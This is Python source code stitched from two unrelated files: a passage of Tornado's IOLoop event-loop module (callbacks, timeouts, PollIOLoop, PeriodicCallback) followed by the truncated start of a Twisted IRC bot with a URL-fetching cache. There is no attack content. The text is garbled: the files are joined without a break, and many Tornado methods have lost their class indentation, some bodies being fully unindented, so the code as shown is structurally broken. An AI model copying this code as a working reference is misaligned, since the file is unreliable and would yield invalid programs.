        """Clears the per-thread "current" marker set by `make_current`."""
        IOLoop._current.instance = None
    @classmethod
    def configurable_base(cls):
        # Hook for tornado.util.Configurable; IOLoop acts as the base of
        # its own configurable hierarchy (see also configurable_default).
        return IOLoop
    @classmethod
    def configurable_default(cls):
        """Picks the best available `IOLoop` implementation per platform:
        epoll on Linux, kqueue on BSD/Mac, select() as last resort.
        """
        if hasattr(select, "epoll"):
            from tornado.platform.epoll import EPollIOLoop
            return EPollIOLoop
        if hasattr(select, "kqueue"):
            # Python 2.6+ on BSD or Mac
            from tornado.platform.kqueue import KQueueIOLoop
            return KQueueIOLoop
        from tornado.platform.select import SelectIOLoop
        return SelectIOLoop
    def initialize(self, make_current=None):
        """Set up the loop's "current" status.

        ``make_current=None`` (the default) becomes current only if no
        other loop already is; ``make_current=True`` insists on becoming
        current and raises `RuntimeError` if another loop already is;
        ``make_current=False`` leaves the current marker untouched.
        """
        if make_current is None:
            if IOLoop.current(instance=False) is None:
                self.make_current()
        elif make_current:
            if IOLoop.current(instance=False) is not None:
                raise RuntimeError("current IOLoop already exists")
            self.make_current()
    def close(self, all_fds=False):
        """Closes the `IOLoop`, freeing any resources used.

        If ``all_fds`` is true, all file descriptors registered on the
        IOLoop will be closed (not just the ones created by the
        `IOLoop` itself).

        Many applications will only use a single `IOLoop` that runs for the
        entire lifetime of the process.  In that case closing the `IOLoop`
        is not necessary since everything will be cleaned up when the
        process exits.  `IOLoop.close` is provided mainly for scenarios
        such as unit tests, which create and destroy a large number of
        ``IOLoops``.

        An `IOLoop` must be completely stopped before it can be closed.  This
        means that `IOLoop.stop()` must be called *and* `IOLoop.start()` must
        be allowed to return before attempting to call `IOLoop.close()`.
        Therefore the call to `close` will usually appear just after
        the call to `start` rather than near the call to `stop`.

        .. versionchanged:: 3.1
           If the `IOLoop` implementation supports non-integer objects
           for "file descriptors", those objects will have their
           ``close`` method called when ``all_fds`` is true.
        """
        # Abstract: implemented by the platform-specific subclasses.
        raise NotImplementedError()
    def add_handler(self, fd, handler, events):
        """Registers the given handler to receive the given events for ``fd``.

        The ``fd`` argument may either be an integer file descriptor or
        a file-like object with a ``fileno()`` method (and optionally a
        ``close()`` method, which may be called when the `IOLoop` is shut
        down).

        The ``events`` argument is a bitwise or of the constants
        ``IOLoop.READ``, ``IOLoop.WRITE``, and ``IOLoop.ERROR``.

        When an event occurs, ``handler(fd, events)`` will be run.

        .. versionchanged:: 4.0
           Added the ability to pass file-like objects in addition to
           raw file descriptors.
        """
        # Abstract: implemented by the platform-specific subclasses.
        raise NotImplementedError()
    def update_handler(self, fd, events):
        """Changes the events we listen for on ``fd``.

        .. versionchanged:: 4.0
           Added the ability to pass file-like objects in addition to
           raw file descriptors.
        """
        # Abstract: implemented by the platform-specific subclasses.
        raise NotImplementedError()
def remove_handler(self, fd):
    """Stops listening for events on ``fd``.

    .. versionchanged:: 4.0
       Added the ability to pass file-like objects in addition to
       raw file descriptors.
    """
    # Abstract: concrete pollers (e.g. PollIOLoop) override this.
    raise NotImplementedError()
def set_blocking_signal_threshold(self, seconds, action):
    """Sends a signal if the `IOLoop` is blocked for more than
    ``seconds`` seconds.

    Pass ``seconds=None`` to disable.  Requires Python 2.6 on a unixy
    platform.

    ``action`` is a Python signal handler (see the documentation of
    the `signal` module).  If ``action`` is None, the process is
    killed when it is blocked for too long.
    """
    # Abstract: concrete pollers (e.g. PollIOLoop) override this.
    raise NotImplementedError()
def set_blocking_log_threshold(self, seconds):
    """Logs a stack trace if the `IOLoop` is blocked for more than
    ``seconds`` seconds.

    Convenience wrapper: equivalent to
    ``set_blocking_signal_threshold(seconds, self.log_stack)``.
    """
    # Reuse the signal-based mechanism with our own stack-logging handler.
    action = self.log_stack
    self.set_blocking_signal_threshold(seconds, action)
def log_stack(self, signal, frame):
    """Signal handler to log the stack trace of the current thread.

    For use with `set_blocking_signal_threshold`; ``signal`` and
    ``frame`` are the standard Python signal-handler arguments.
    """
    # Uses the module-level ``gen_log`` logger; the threshold value is
    # stored by set_blocking_signal_threshold on the concrete subclass.
    gen_log.warning('IOLoop blocked for %f seconds in\n%s',
                    self._blocking_signal_threshold,
                    ''.join(traceback.format_stack(frame)))
def start(self):
    """Starts the I/O loop.

    The loop keeps running until some callback calls `stop()`; the
    loop then exits after the current event iteration completes.
    """
    # Abstract: concrete pollers (e.g. PollIOLoop) override this.
    raise NotImplementedError()
def _setup_logging(self):
"""The IOLoop catches and logs exceptions, so it's
important that log output be visible. However, python's
default behavior for non-root loggers (prior to python
3.2) is to print an unhelpful "no handlers could be
found" message rather than the actual log entry, so we
must explicitly configure logging if we've made it this
far without anything.
This method should be called from start() in subclasses.
"""
if not any([logging.getLogger().handlers,
logging.getLogger('tornado').handlers,
logging.getLogger('tornado.application').handlers]):
logging.basicConfig()
def stop(self):
    """Stop the I/O loop.

    If the loop is not currently running, the next call to `start()`
    returns immediately.

    A common pattern for driving async code from synchronous code
    (e.g. unit tests)::

        ioloop = IOLoop()
        async_method(ioloop=ioloop, callback=ioloop.stop)
        ioloop.start()

    ``ioloop.start()`` returns after ``async_method`` has run its
    callback, whether that callback fired before or after
    ``ioloop.start``.

    Note that even after `stop` has been called, the `IOLoop` is not
    completely stopped until `IOLoop.start` has also returned; work
    scheduled before the `stop` call may still run first.
    """
    # Abstract: concrete pollers (e.g. PollIOLoop) override this.
    raise NotImplementedError()
def run_sync(self, func, timeout=None):
    """Starts the `IOLoop`, runs the given function, and stops the loop.

    The function must return either a yieldable object or ``None``.
    If the function returns a yieldable object, the `IOLoop` will run
    until the yieldable is resolved (and `run_sync()` will return the
    yieldable's result).  If it raises an exception, the `IOLoop` will
    stop and the exception will be re-raised to the caller.

    The keyword-only argument ``timeout`` may be used to set a maximum
    duration for the function.  If the timeout expires, a
    `TimeoutError` is raised.

    This method is useful in conjunction with `tornado.gen.coroutine`
    to allow asynchronous calls in a ``main()`` function::

        @gen.coroutine
        def main():
            # do stuff...

        if __name__ == '__main__':
            IOLoop.current().run_sync(main)

    .. versionchanged:: 4.3
       Returning a non-``None``, non-yieldable value is now an error.
    """
    # One-element list used as a mutable cell so the nested closure
    # can communicate the resulting future back to this frame.
    future_cell = [None]

    def run():
        try:
            result = func()
            if result is not None:
                # Imported lazily to avoid a circular import with tornado.gen.
                from tornado.gen import convert_yielded
                result = convert_yielded(result)
        except Exception:
            # Capture the exception (with traceback) in a future so it is
            # re-raised from future_cell[0].result() below.
            future_cell[0] = TracebackFuture()
            future_cell[0].set_exc_info(sys.exc_info())
        else:
            if is_future(result):
                future_cell[0] = result
            else:
                # Plain (None) result: wrap it so the completion path is uniform.
                future_cell[0] = TracebackFuture()
                future_cell[0].set_result(result)
        # Stop the loop as soon as the result future resolves.
        self.add_future(future_cell[0], lambda future: self.stop())
    self.add_callback(run)
    if timeout is not None:
        # Also stop the loop when the deadline passes, even if the
        # future has not resolved; detected via done() below.
        timeout_handle = self.add_timeout(self.time() + timeout, self.stop)
    self.start()
    if timeout is not None:
        self.remove_timeout(timeout_handle)
    if not future_cell[0].done():
        raise TimeoutError('Operation timed out after %s seconds' % timeout)
    # Returns the value or re-raises the captured exception.
    return future_cell[0].result()
def time(self):
    """Returns the current time according to the `IOLoop`'s clock.

    The return value is a floating-point number relative to an
    unspecified time in the past.

    By default, the `IOLoop`'s time function is `time.time`.  However,
    it may be configured to use e.g. `time.monotonic` instead
    (subclasses may override this method; see PollIOLoop.time_func).

    Calls to `add_timeout` that pass a number instead of a
    `datetime.timedelta` should use this function to compute the
    appropriate time, so they can work no matter what time function
    is chosen.
    """
    return time.time()
def add_timeout(self, deadline, callback, *args, **kwargs):
    """Runs ``callback`` at the time ``deadline`` from the I/O loop.

    Returns an opaque handle that may be passed to `remove_timeout`
    to cancel.

    ``deadline`` may be a number denoting a time (on the same scale
    as `IOLoop.time`, normally `time.time`), or a
    `datetime.timedelta` for a deadline relative to the current time.
    Since Tornado 4.0, `call_later` is a more convenient alternative
    for the relative case since it does not require a timedelta
    object.

    Note that it is not safe to call `add_timeout` from other
    threads; use `add_callback` to transfer control to the `IOLoop`'s
    thread first.

    Subclasses of IOLoop must implement either `add_timeout` or
    `call_at`; the default implementations of each call the other.

    .. versionchanged:: 4.0
       Now passes through ``*args`` and ``**kwargs`` to the callback.
    """
    # Guard-clause dispatch on the deadline type.
    if isinstance(deadline, numbers.Real):
        return self.call_at(deadline, callback, *args, **kwargs)
    if isinstance(deadline, datetime.timedelta):
        # Convert the relative timedelta to an absolute time on our clock.
        relative = timedelta_to_seconds(deadline)
        return self.call_at(self.time() + relative,
                            callback, *args, **kwargs)
    raise TypeError("Unsupported deadline %r" % deadline)
def call_later(self, delay, callback, *args, **kwargs):
    """Runs ``callback`` after ``delay`` seconds have passed.

    Returns an opaque handle that may be passed to `remove_timeout`
    to cancel.  Note that unlike the `asyncio` method of the same
    name, the returned object does not have a ``cancel()`` method.

    See `add_timeout` for comments on thread-safety and subclassing.

    .. versionadded:: 4.0
    """
    # Translate the relative delay to an absolute deadline on our clock.
    deadline = self.time() + delay
    return self.call_at(deadline, callback, *args, **kwargs)
def call_at(self, when, callback, *args, **kwargs):
    """Runs the ``callback`` at the absolute time designated by ``when``.

    ``when`` must be a number using the same reference point as
    `IOLoop.time`.

    Returns an opaque handle that may be passed to `remove_timeout`
    to cancel.  Note that unlike the `asyncio` method of the same
    name, the returned object does not have a ``cancel()`` method.

    See `add_timeout` for comments on thread-safety and subclassing.

    .. versionadded:: 4.0
    """
    # Default implementation delegates to add_timeout; subclasses
    # implement at least one of the two (each defaults to the other).
    return self.add_timeout(when, callback, *args, **kwargs)
def remove_timeout(self, timeout):
    """Cancels a pending timeout.

    ``timeout`` is a handle as returned by `add_timeout`.  It is safe
    to call `remove_timeout` even if the callback has already run.
    """
    # Abstract: concrete pollers (e.g. PollIOLoop) override this.
    raise NotImplementedError()
def add_callback(self, callback, *args, **kwargs):
    """Calls the given callback on the next I/O loop iteration.

    This is the **only** `IOLoop` method that is safe to call from
    any thread at any time (except from a signal handler); all other
    interaction with the `IOLoop` must happen on the `IOLoop`'s own
    thread.  `add_callback()` may therefore be used to transfer
    control from other threads to the `IOLoop`'s thread.

    To add a callback from a signal handler, see
    `add_callback_from_signal`.
    """
    # Abstract: concrete pollers (e.g. PollIOLoop) override this.
    raise NotImplementedError()
def add_callback_from_signal(self, callback, *args, **kwargs):
    """Calls the given callback on the next I/O loop iteration.

    Safe for use from a Python signal handler; should not be used
    otherwise.

    Callbacks added with this method run without any `.stack_context`
    so they do not pick up the context of whatever function the
    signal interrupted.
    """
    # Abstract: concrete pollers (e.g. PollIOLoop) override this.
    raise NotImplementedError()
def spawn_callback(self, callback, *args, **kwargs):
    """Calls the given callback on the next IOLoop iteration.

    Unlike all other callback-related methods on IOLoop,
    ``spawn_callback`` does not associate the callback with its caller's
    ``stack_context``, so it is suitable for fire-and-forget callbacks
    that should not interfere with the caller.

    .. versionadded:: 4.0
    """
    # NullContext strips the caller's stack_context before scheduling.
    with stack_context.NullContext():
        self.add_callback(callback, *args, **kwargs)
def add_future(self, future, callback):
    """Schedules a callback on the ``IOLoop`` when the given
    `.Future` is finished.

    The callback is invoked with one argument, the `.Future`.
    """
    assert is_future(future)
    # Capture the caller's stack_context so the callback runs in it.
    callback = stack_context.wrap(callback)
    # Hop through add_callback: it is the one documented thread-safe
    # entry point, so this works no matter which thread completes the
    # future.
    future.add_done_callback(
        lambda future: self.add_callback(callback, future))
def _run_callback(self, callback):
    """Runs a callback with error handling.

    For use in subclasses.  Synchronous exceptions are routed to
    `handle_callback_exception`; if the callback returns a yieldable,
    its eventual exception (if any) is surfaced as well.
    """
    try:
        ret = callback()
        if ret is not None:
            from tornado import gen
            # Functions that return Futures typically swallow all
            # exceptions and store them in the Future. If a Future
            # makes it out to the IOLoop, ensure its exception (if any)
            # gets logged too.
            try:
                ret = gen.convert_yielded(ret)
            except gen.BadYieldError:
                # It's not unusual for add_callback to be used with
                # methods returning a non-None and non-yieldable
                # result, which should just be ignored.
                pass
            else:
                # Consuming the result raises (and thus logs) any
                # stored exception.
                self.add_future(ret, self._discard_future_result)
    except Exception:
        self.handle_callback_exception(callback)
def _discard_future_result(self, future):
"""Avoid unhandled-exception warnings from spawned coroutines."""
future.result()
def handle_callback_exception(self, callback):
    """This method is called whenever a callback run by the `IOLoop`
    throws an exception.

    By default simply logs the exception as an error.  Subclasses
    may override this method to customize reporting of exceptions.

    The exception itself is not passed explicitly, but is available
    in `sys.exc_info` (hence ``exc_info=True`` below, which must be
    evaluated while the exception is still being handled).
    """
    app_log.error("Exception in callback %r", callback, exc_info=True)
def split_fd(self, fd):
    """Returns an ``(fd, obj)`` pair from an ``fd`` parameter.

    Both raw file descriptors and file-like objects are accepted by
    `add_handler` and related methods.  When a file-like object is
    passed we must retain the object itself (so it can be closed
    correctly at shutdown), while the poller interfaces want the
    integer descriptor — so return both.

    This method is provided for use by `IOLoop` subclasses and should
    not generally be used by application code.

    .. versionadded:: 4.0
    """
    fileno = getattr(fd, "fileno", None)
    if fileno is None:
        # Already a raw descriptor: the descriptor is its own "object".
        return fd, fd
    return fileno(), fd
def close_fd(self, fd):
    """Utility method to close an ``fd``.

    File-like objects are closed via their own ``close()``; raw
    integer descriptors go through `os.close`.  ``OSError`` is
    swallowed so closing an already-closed descriptor is harmless.

    This method is provided for use by `IOLoop` subclasses (in
    implementations of ``IOLoop.close(all_fds=True)``) and should not
    generally be used by application code.

    .. versionadded:: 4.0
    """
    closer = getattr(fd, "close", None)
    try:
        if closer is not None:
            closer()
        else:
            os.close(fd)
    except OSError:
        pass
class PollIOLoop(IOLoop):
    """Base class for IOLoops built around a select-like function.

    For concrete implementations, see `tornado.platform.epoll.EPollIOLoop`
    (Linux), `tornado.platform.kqueue.KQueueIOLoop` (BSD and Mac), or
    `tornado.platform.select.SelectIOLoop` (all platforms).
    """
    def initialize(self, impl, time_func=None, **kwargs):
        """Set up poller state.

        ``impl`` is the select-like poller object supplied by the
        concrete subclass; ``time_func`` overrides the loop clock
        (defaults to `time.time`).
        """
        super(PollIOLoop, self).initialize(**kwargs)
        self._impl = impl
        if hasattr(self._impl, 'fileno'):
            set_close_exec(self._impl.fileno())
        self.time_func = time_func or time.time
        self._handlers = {}        # fd -> (fd object, wrapped handler)
        self._events = {}          # fd -> pending events not yet dispatched
        self._callbacks = []       # callbacks to run on the next iteration
        self._callback_lock = threading.Lock()
        self._timeouts = []        # heap of _Timeout objects
        self._cancellations = 0    # cancelled entries still sitting in the heap
        self._running = False
        self._stopped = False
        self._closing = False
        self._thread_ident = None
        self._blocking_signal_threshold = None
        self._timeout_counter = itertools.count()

        # Create a pipe that we send bogus data to when we want to wake
        # the I/O loop when it is idle
        self._waker = Waker()
        self.add_handler(self._waker.fileno(),
                         lambda fd, events: self._waker.consume(),
                         self.READ)

    def close(self, all_fds=False):
        # Take the lock only to flip _closing so a concurrent
        # add_callback sees it and bails out.
        with self._callback_lock:
            self._closing = True
        self.remove_handler(self._waker.fileno())
        if all_fds:
            # Values are (fd object, handler) pairs; close the object side.
            for fd, handler in self._handlers.values():
                self.close_fd(fd)
        self._waker.close()
        self._impl.close()
        self._callbacks = None
        self._timeouts = None

    def add_handler(self, fd, handler, events):
        fd, obj = self.split_fd(fd)
        self._handlers[fd] = (obj, stack_context.wrap(handler))
        # ERROR is always of interest; the poller reports it regardless.
        self._impl.register(fd, events | self.ERROR)

    def update_handler(self, fd, events):
        fd, obj = self.split_fd(fd)
        self._impl.modify(fd, events | self.ERROR)

    def remove_handler(self, fd):
        fd, obj = self.split_fd(fd)
        self._handlers.pop(fd, None)
        self._events.pop(fd, None)
        try:
            self._impl.unregister(fd)
        except Exception:
            gen_log.debug("Error deleting fd from IOLoop", exc_info=True)

    def set_blocking_signal_threshold(self, seconds, action):
        if not hasattr(signal, "setitimer"):
            gen_log.error("set_blocking_signal_threshold requires a signal module "
                          "with the setitimer method")
            return
        self._blocking_signal_threshold = seconds
        if seconds is not None:
            signal.signal(signal.SIGALRM,
                          action if action is not None else signal.SIG_DFL)

    def start(self):
        if self._running:
            raise RuntimeError("IOLoop is already running")
        self._setup_logging()
        if self._stopped:
            # stop() was called before start(): return immediately.
            self._stopped = False
            return
        old_current = getattr(IOLoop._current, "instance", None)
        IOLoop._current.instance = self
        self._thread_ident = thread.get_ident()
        self._running = True

        # signal.set_wakeup_fd closes a race condition in event loops:
        # a signal may arrive at the beginning of select/poll/etc
        # before it goes into its interruptible sleep, so the signal
        # will be consumed without waking the select. The solution is
        # for the (C, synchronous) signal handler to write to a pipe,
        # which will then be seen by select.
        #
        # In python's signal handling semantics, this only matters on the
        # main thread (fortunately, set_wakeup_fd only works on the main
        # thread and will raise a ValueError otherwise).
        #
        # If someone has already set a wakeup fd, we don't want to
        # disturb it. This is an issue for twisted, which does its
        # SIGCHLD processing in response to its own wakeup fd being
        # written to. As long as the wakeup fd is registered on the IOLoop,
        # the loop will still wake up and everything should work.
        old_wakeup_fd = None
        if hasattr(signal, 'set_wakeup_fd') and os.name == 'posix':
            # requires python 2.6+, unix. set_wakeup_fd exists but crashes
            # the python process on windows.
            try:
                old_wakeup_fd = signal.set_wakeup_fd(self._waker.write_fileno())
                if old_wakeup_fd != -1:
                    # Already set, restore previous value. This is a little racy,
                    # but there's no clean get_wakeup_fd and in real use the
                    # IOLoop is just started once at the beginning.
                    signal.set_wakeup_fd(old_wakeup_fd)
                    old_wakeup_fd = None
            except ValueError:
                # Non-main thread, or the previous value of wakeup_fd
                # is no longer valid.
                old_wakeup_fd = None
        try:
            while True:
                # Prevent IO event starvation by delaying new callbacks
                # to the next iteration of the event loop.
                with self._callback_lock:
                    callbacks = self._callbacks
                    self._callbacks = []

                # Add any timeouts that have come due to the callback list.
                # Do not run anything until we have determined which ones
                # are ready, so timeouts that call add_timeout cannot
                # schedule anything in this iteration.
                due_timeouts = []
                if self._timeouts:
                    now = self.time()
                    while self._timeouts:
                        if self._timeouts[0].callback is None:
                            # The timeout was cancelled. Note that the
                            # cancellation check is repeated below for timeouts
                            # that are cancelled by another timeout or callback.
                            heapq.heappop(self._timeouts)
                            self._cancellations -= 1
                        elif self._timeouts[0].deadline <= now:
                            due_timeouts.append(heapq.heappop(self._timeouts))
                        else:
                            break
                    if (self._cancellations > 512 and
                            self._cancellations > (len(self._timeouts) >> 1)):
                        # Clean up the timeout queue when it gets large and it's
                        # more than half cancellations.
                        self._cancellations = 0
                        self._timeouts = [x for x in self._timeouts
                                          if x.callback is not None]
                        heapq.heapify(self._timeouts)

                for callback in callbacks:
                    self._run_callback(callback)
                for timeout in due_timeouts:
                    if timeout.callback is not None:
                        self._run_callback(timeout.callback)
                # Closures may be holding on to a lot of memory, so allow
                # them to be freed before we go into our poll wait.
                callbacks = callback = due_timeouts = timeout = None

                if self._callbacks:
                    # If any callbacks or timeouts called add_callback,
                    # we don't want to wait in poll() before we run them.
                    poll_timeout = 0.0
                elif self._timeouts:
                    # If there are any timeouts, schedule the first one.
                    # Use self.time() instead of 'now' to account for time
                    # spent running callbacks.
                    poll_timeout = self._timeouts[0].deadline - self.time()
                    poll_timeout = max(0, min(poll_timeout, _POLL_TIMEOUT))
                else:
                    # No timeouts and no callbacks, so use the default.
                    poll_timeout = _POLL_TIMEOUT

                if not self._running:
                    break

                if self._blocking_signal_threshold is not None:
                    # clear alarm so it doesn't fire while poll is waiting for
                    # events.
                    signal.setitimer(signal.ITIMER_REAL, 0, 0)

                try:
                    event_pairs = self._impl.poll(poll_timeout)
                except Exception as e:
                    # Depending on python version and IOLoop implementation,
                    # different exception types may be thrown and there are
                    # two ways EINTR might be signaled:
                    # * e.errno == errno.EINTR
                    # * e.args is like (errno.EINTR, 'Interrupted system call')
                    if errno_from_exception(e) == errno.EINTR:
                        continue
                    else:
                        raise

                if self._blocking_signal_threshold is not None:
                    # Re-arm the "blocked too long" alarm while handlers run.
                    signal.setitimer(signal.ITIMER_REAL,
                                     self._blocking_signal_threshold, 0)

                # Pop one fd at a time from the set of pending fds and run
                # its handler. Since that handler may perform actions on
                # other file descriptors, there may be reentrant calls to
                # this IOLoop that modify self._events
                self._events.update(event_pairs)
                while self._events:
                    fd, events = self._events.popitem()
                    try:
                        fd_obj, handler_func = self._handlers[fd]
                        handler_func(fd_obj, events)
                    except (OSError, IOError) as e:
                        if errno_from_exception(e) == errno.EPIPE:
                            # Happens when the client closes the connection
                            pass
                        else:
                            self.handle_callback_exception(self._handlers.get(fd))
                    except Exception:
                        self.handle_callback_exception(self._handlers.get(fd))
                # Drop references so handlers can be garbage collected.
                fd_obj = handler_func = None

        finally:
            # reset the stopped flag so another start/stop pair can be issued
            self._stopped = False
            if self._blocking_signal_threshold is not None:
                signal.setitimer(signal.ITIMER_REAL, 0, 0)
            IOLoop._current.instance = old_current
            if old_wakeup_fd is not None:
                signal.set_wakeup_fd(old_wakeup_fd)

    def stop(self):
        self._running = False
        self._stopped = True
        # Wake the poller so the loop notices _running is now False.
        self._waker.wake()

    def time(self):
        return self.time_func()

    def call_at(self, deadline, callback, *args, **kwargs):
        timeout = _Timeout(
            deadline,
            functools.partial(stack_context.wrap(callback), *args, **kwargs),
            self)
        heapq.heappush(self._timeouts, timeout)
        return timeout

    def remove_timeout(self, timeout):
        # Removing from a heap is complicated, so just leave the defunct
        # timeout object in the queue (see discussion in
        # http://docs.python.org/library/heapq.html).
        # If this turns out to be a problem, we could add a garbage
        # collection pass whenever there are too many dead timeouts.
        timeout.callback = None
        self._cancellations += 1

    def add_callback(self, callback, *args, **kwargs):
        if thread.get_ident() != self._thread_ident:
            # If we're not on the IOLoop's thread, we need to synchronize
            # with other threads, or waking logic will induce a race.
            with self._callback_lock:
                if self._closing:
                    return
                list_empty = not self._callbacks
                self._callbacks.append(functools.partial(
                    stack_context.wrap(callback), *args, **kwargs))
                if list_empty:
                    # If we're not in the IOLoop's thread, and we added the
                    # first callback to an empty list, we may need to wake it
                    # up (it may wake up on its own, but an occasional extra
                    # wake is harmless). Waking up a polling IOLoop is
                    # relatively expensive, so we try to avoid it when we can.
                    self._waker.wake()
        else:
            if self._closing:
                return
            # If we're on the IOLoop's thread, we don't need the lock,
            # since we don't need to wake anyone, just add the
            # callback. Blindly insert into self._callbacks. This is
            # safe even from signal handlers because the GIL makes
            # list.append atomic. One subtlety is that if the signal
            # is interrupting another thread holding the
            # _callback_lock block in IOLoop.start, we may modify
            # either the old or new version of self._callbacks, but
            # either way will work.
            self._callbacks.append(functools.partial(
                stack_context.wrap(callback), *args, **kwargs))

    def add_callback_from_signal(self, callback, *args, **kwargs):
        # NullContext avoids capturing the interrupted frame's stack_context.
        with stack_context.NullContext():
            self.add_callback(callback, *args, **kwargs)
class _Timeout(object):
    """An IOLoop timeout, a UNIX timestamp and a callback"""

    # Reduce memory overhead when there are lots of pending callbacks
    __slots__ = ['deadline', 'callback', 'tdeadline']

    def __init__(self, deadline, callback, io_loop):
        if not isinstance(deadline, numbers.Real):
            raise TypeError("Unsupported deadline %r" % deadline)
        self.deadline = deadline
        self.callback = callback
        # (deadline, insertion counter): the per-loop counter breaks ties
        # between equal deadlines so heap ordering is total and stable.
        self.tdeadline = (deadline, next(io_loop._timeout_counter))

    # Comparison methods to sort by deadline, with the insertion counter
    # as a tiebreaker to guarantee a consistent ordering. The heapq module
    # uses __le__ in python 2.5, and __lt__ in 2.6+ (sort() and most other
    # comparisons use __lt__).
    def __lt__(self, other):
        return self.tdeadline < other.tdeadline

    def __le__(self, other):
        return self.tdeadline <= other.tdeadline
class PeriodicCallback(object):
    """Schedules the given callback to be called periodically.

    The callback is called every ``callback_time`` milliseconds (note:
    milliseconds, while most other time-related functions in Tornado
    use seconds).

    If the callback runs for longer than ``callback_time``, subsequent
    invocations are skipped to get back on schedule.

    `start` must be called after the `PeriodicCallback` is created.

    .. versionchanged:: 4.1
       The ``io_loop`` argument is deprecated.
    """

    def __init__(self, callback, callback_time, io_loop=None):
        self.callback = callback
        if callback_time <= 0:
            raise ValueError("Periodic callback must have a positive callback_time")
        self.callback_time = callback_time
        self.io_loop = io_loop or IOLoop.current()
        self._running = False
        self._timeout = None

    def start(self):
        """Starts the timer."""
        self._running = True
        # First run is scheduled one period after "now".
        self._next_timeout = self.io_loop.time()
        self._schedule_next()

    def stop(self):
        """Stops the timer."""
        self._running = False
        if self._timeout is None:
            return
        self.io_loop.remove_timeout(self._timeout)
        self._timeout = None

    def is_running(self):
        """Return True if this `.PeriodicCallback` has been started.

        .. versionadded:: 4.1
        """
        return self._running

    def _run(self):
        """Timer target: invoke the callback and schedule the next run."""
        if not self._running:
            return
        try:
            return self.callback()
        except Exception:
            self.io_loop.handle_callback_exception(self.callback)
        finally:
            # Always reschedule, even when the callback raised.
            self._schedule_next()

    def _schedule_next(self):
        """Advance the deadline past "now" and register the timeout."""
        if not self._running:
            return
        now = self.io_loop.time()
        if self._next_timeout <= now:
            # Skip whole missed periods so the schedule stays aligned.
            period = self.callback_time / 1000.0
            missed = math.floor((now - self._next_timeout) / period) + 1
            self._next_timeout += missed * period
        self._timeout = self.io_loop.add_timeout(self._next_timeout, self._run)
|
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
A modular python bot based on the twisted matrix irc library
@author Riku 'Shrike' Lindblad (shrike@addiktit.net)
@copyright Copyright (c) 2006 Riku Lindblad
@license New-Style BSD
"""
import re
import sys
import os.path
import time
import urllib
import fnmatch
import HTMLParser
import logging
import logging.handlers
try:
import psyco
psyco.full()
except ImportError:
print "Psyco not found, running unoptimized"
try:
import yaml
except ImportError:
print "PyYAML not found, please install from http://pyyaml.org/wiki/PyYAML"
sys.exit(1)
# twisted imports
try:
from twisted.words.protocols import irc
from twisted.internet import reactor, protocol, threads, defer
from twisted.python import rebuild
except ImportError:
print "Twisted library not found, please install Twisted from http://twistedmatrix.com/products/download"
sys.exit(1)
from util import *
from util.BeautifulSoup import BeautifulSoup
from util.BeautifulSoup import UnicodeDammit
# default timeout for socket connections
import socket
socket.setdefaulttimeout(20)
import botcore
log = logging.getLogger('core')
class URLCacheItem(object):
    """URL cache item object, fetches data only when needed"""

    def __init__(self, url):
        self.url = url
        self.content = None    # decoded page body, fetched lazily
        self.headers = None    # mimetools-style headers, fetched lazily
        self.bs = None         # BeautifulSoup tree, built lazily
        # maximum size in kB to download
        self.max_size = 2048
        self.fp = None         # underlying urllib file object

    def _open(self, url):
        """Returns the raw file pointer to the given URL"""
        if not self.fp:
            # Install our spoofing opener before fetching.
            urllib._urlopener = BotURLOpener()
            try:
                self.fp = urllib.urlopen(self.url)
            except IOError, e:
                # Best-effort: log and fall through; callers must cope
                # with self.fp being None.
                log.warn("IOError when opening url %s" % url)
        return self.fp

    def _checkstatus(self):
        """Check if all data has already been cached and close socket if so"""
        if self.content and \
           self.headers and \
           self.bs:
            self.fp.close()

    def getSize(self):
        """Get the content length of URL in kB

        @return None if the server doesn't return a content-length header"""
        if self.getHeaders().has_key('content-length'):
            length = int(self.getHeaders()['content-length'])/1024
            return length
        else:
            return None

    def getContent(self):
        """Get the actual file at the URL

        @return None if the file is too large (over 2MB)"""
        if not self.content:
            f = self._open(self.url)
            size = self.getSize()
            # NOTE(review): when the server sends no content-length,
            # getSize() returns None and (Python 2) None > int is False,
            # so the download proceeds unchecked — confirm this is intended.
            if size > self.max_size:
                log.warn("CONTENT TOO LARGE, WILL NOT FETCH %s %s" % (size, self.url))
                self.content = None
            else:
                if self.checkType():
                    # Let UnicodeDammit guess the encoding and decode.
                    self.content = UnicodeDammit(f.read()).unicode
                else:
                    type = self.getHeaders().getsubtype()
                    log.warn("WRONG CONTENT TYPE, WILL NOT FETCH %s, %s, %s" % (size, type, self.url))
        self._checkstatus()
        return self.content

    def getHeaders(self):
        """Get headers for the URL"""
        if not self.headers:
            f = self._open(self.url)
            if f:
                self.headers = f.info()
            else:
                # Open failed: fall back to an empty mapping so callers
                # using has_key()/[] don't crash.
                self.headers = {}
        self._checkstatus()
        return self.headers

    def checkType(self):
        # True when the content subtype looks like markup we can parse.
        if self.getHeaders().getsubtype() in ['html', 'xml', 'xhtml+xml', 'atom+xml']:
            return True
        else:
            return False

    def getBS(self):
        """Get a beautifulsoup instance for the URL

        @return None if the url doesn't contain HTML
        """
        if not self.bs:
            # only attempt a bs parsing if the content is html, xml or xhtml
            if self.getHeaders().has_key('content-type') and \
               self.getHeaders().getsubtype() in ['html', 'xml', 'xhtml+xml', 'atom+xml']:
                try:
                    bs = BeautifulSoup(markup=self.getContent())
                except HTMLParser.HTMLParseError:
                    log.warn("BS unable to parse content")
                    return None
                self.bs = bs
            else:
                return None
        self._checkstatus()
        return self.bs
class BotURLOpener(urllib.FancyURLopener):
    """URL opener that spoofs a browser user-agent and ignores all basic
    auth prompts (always answers with empty credentials)."""

    def __init__(self, *args):
        # Spoofed user-agent string (Chrome on Windows); some sites refuse
        # or alter responses for unknown clients.
        self.version = "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.0 (KHTML, like Gecko) Chrome/6.0.408.1 Safari/534.0"
        urllib.FancyURLopener.__init__(self, *args)

    def prompt_user_passwd(self, host, realm):
        # BUG FIX: stdlib logging uses %-style format arguments, not a
        # print-style argument list.  The old call
        # ``log.info("PASSWORD PROMPT:", host, realm)`` had no %s
        # placeholders, so logging raised a formatting error internally
        # and host/realm were never logged.
        log.info("PASSWORD PROMPT: %s %s", host, realm)
        # Never prompt interactively; return empty credentials so the
        # request simply fails auth instead of blocking the bot.
        return ('', '')
class Network:
    """Connection settings for a single IRC network.

    Creating an instance also ensures the network's private save
    directory (``root/alias``) exists on disk.
    """

    def __init__(self, root, alias, address, nickname, password, realname, channels = None):
        self.alias = alias              # network name
        self.address = address          # server address
